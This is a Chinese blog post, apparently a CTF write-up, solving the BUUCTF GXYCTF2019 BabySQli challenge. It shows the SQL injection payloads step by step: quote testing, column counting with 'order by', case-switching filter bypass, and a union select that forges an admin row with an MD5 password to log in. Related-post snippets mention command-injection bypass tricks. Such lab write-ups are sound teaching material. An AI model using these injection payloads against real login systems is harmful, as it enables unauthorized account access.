BUUCTF[GXYCTF2019]BabySQli

最新推荐文章于 2023-09-16 10:57:39 发布
最新推荐文章于 2023-09-16 10:57:39 发布
阅读量2.1k 收藏
点赞数
分类专栏: CTF日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/117160701
版权

sql 安全漏洞

SQL注入题型,在进行了自己的一些测试发现,用户名存在admin,我们F12看看源码:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>Do you know who am I?</title>
<center>
	<form action="search.php" method="post" style="margin-top: 300">
		<input type="text" name="name" placeholder="UserName" required>
		<br>
		<input type="password" style="margin-top: 20" name="pw" placeholder="password" required>
		<br>
		<button style="margin-top:20;" type="submit">登录</button>
	</form>
</center>

由于没有注释内容,所以我试试抓包看看有没有注释内容, 

<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->

base32 只有大写字母和数字数字组成,或者后面有三个等号。
base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。  

可以看出这是base32加密,解密如下:

c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==

base64解密得到sql语句,这句话应该是提示

select * from user where username = '$name'

单引号闭合,使用payload:

name=admin'&pw=123

查看字段数:

name=admin' order by 3#&pw=123

 

大小写绕过尝试:

name=admin' Order by 3#&pw=123

 

name=admin' Order by 4#&pw=123 

 

 字段数为3,查看回显点位,

name=admin' union select 1,2,3#&pw=123

 

由于回显一样,暂时看不到,我们继续往后做。 

这里学到了一个新知识:mysql在联合查询不存在的数据时,会自动构建虚拟数据,

比如我们使用:

select * from user where username = 'wxs' union select 1,'admin','123456';

 原本库里没有123456,但mysql自动给我们加上了,相当于我们临时创建了一个admin用户,密码是123456。

所以我们假设密码是123456,其md5值为:e10adc3949ba59abbe56e057f20f883e

构造payload:

name=1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#&pw=123456

成功登录得到flag:

思路:利用构造一个虚拟身份来进行伪造真实身份,从而绕过审核机制。  

carefree798
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BUUCTF:[GXYCTF2019]BabySQli
末初的CSDN博客
11-07 2244
https://buuoj.cn/challenges#[GXYCTF2019]BabySQli 登陆类注入,有过滤 这是一段base32解码后是base64再解一次得到 select * from user where username = '$name' Trick 使用联合查询构造虚拟查询记录进行登录 这里有个小坑,原题应该是有对密码进行了md5加密后存储的,但是这里没有提示 PS C:\Users\Administrator> php -r "var_dump(md5('mo
BUUCTF [GXYCTF2019]BabySQli 1
lzu_lfl的博客
10-06 349
union联合查询生成虚拟数据
web buuctf [GXYCTF2019]BabySQli1
weixin_44214568的博客
03-18 1429
知识点:联合注入(当联合查询不存在时,联合查询就会构造一个虚拟的数据) 1.尝试在用户和密码选项中分别进行注入,1' or '1=1'# ;1 or 1=1#;。。。都无法注入 2.再输入1',用户一栏存在报错,且输入为字符型,尝试报错注入,也不行(可以用bp的fuzz,效率高点,根据response,能够知道or和()都被过滤了); 3.级联注入:在用户栏输入1' union select 1,2# 报错Error: The used SELECT statements have a differ
BUU实战笔记——[GXYCTF2019]BabySQli1
qq_51175992的博客
09-16 241
这题是很简单的SQL注入,考察的是基本功和对联合查询的理解这里有两点需要特别注意:1. 不管是CTF题目还是实际的挖洞一定要先把它的流程走一遍看它是怎么玩的,再考虑怎么攻击,前期的信息收集十分重要!2.数据库的密码一般是通过MD5加密处理的,在注入的时候需要特别注意。
[GXYCTF2019]BabySQli
satasun的博客
07-07 2482
看了大佬的博客,勉强整出来了,详细的写一下我的思路。 错误思路: 观察发现是post传值,想用sqlmap一把嗦,BP抓包=>sqlmap 得到数据库:web_sqli 表:user 字段:passwd 得到密码是cdc9c819c7f8be2628d4180669009d28 得到passwd以后想爆一下username:admin 爆是爆出来了,没啥乱用。撞库也撞不出来,没辙了。 正确思路: 利用sqli的特性:在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 说人话,上实例:
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
最新发布
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF 个人做题记录【6-6】
qq_61620566的博客
06-06 358
一个ctf的成长记录
你知道我是谁吗?Do You Know Who I Am?
趋势创造者-一直在努力,拥抱大海,拥抱浩瀚的天空,探知未来的世界 祗偽妳動訫 Happiness keeps you Sweet
11-08 727
Text A                                 Do You Know Who I Am?    Mr Smith is well known in Washington because of his many social blunders. He always likes to attend the various social functions becaus...
CTF命令执行的常见姿势
weixin_40103894的博客
09-28 1512
1.**cat fl[abc]g.php ** //匹配[abc]中的任何一个。11.**vi **–使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出。1.**wh\o\ami ** //反斜线绕过。3.**cat fla* ** //用*匹配任意。3.**whoa’m’i ** //单引号绕过。4.**whoam``i ** //反引号绕过。8.**nl **–类似于cat -n,显示时输出行号。
php命令执行绕过,CTF之命令执行绕过总结
weixin_36260335的博客
03-17 2086
## Linux篇### 命令拼接```a=whob=ami$a$b //输出whoami```![title](https://leanote.com/api/file/getImage?fileId=5f0db908ab64412cdb001838)常用字符使用```& 表示将任务置于后台执行; 多行语句用换行区分代码快,单行语句一般要用到分...
CTF-网络信息安全攻防学习平台(基础关)
热门推荐
凝聚力安全团队
06-30 1万+
基础关第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关第十一关第十二关 题库地址:http://hackinglab.cn 第一关 题目:         key值在哪里? 解题方法: 查看源代码即可看到key值 ctrl+u F12 view-source:http://xxxxx 鼠标右键->点击查看页面源代码 第二关 题目:       
SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证
weixin_37537965的博客
12-26 764
DVWA-&gt;SQL Injection //后台sql语句 select * from users where username='$name' and password='$pwd'; 当查询到数据表中存在同时满足 username 和 password 字段的数据时,会返回登录成功。例如,用户名为admin,密码为123时: //实际执行语句 select * from use...
mysql ii_Training: MySQL II
weixin_29268267的博客
02-07 111
首先关于SQL的select语句SELECT * FROM users WHERE username='$username'*代表着搜索全部,fromusername为在username表中搜索,where限定username为输入的值源代码截图我们可以看到表有三个关键字,分别是userid,username和password,因此在后面的构造时,也应该构造这三个参数。首先说原理(纠结了半天在大...
buuctf 极客大挑战2019php
08-24
buuctf 极客大挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT极客创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [极客大挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值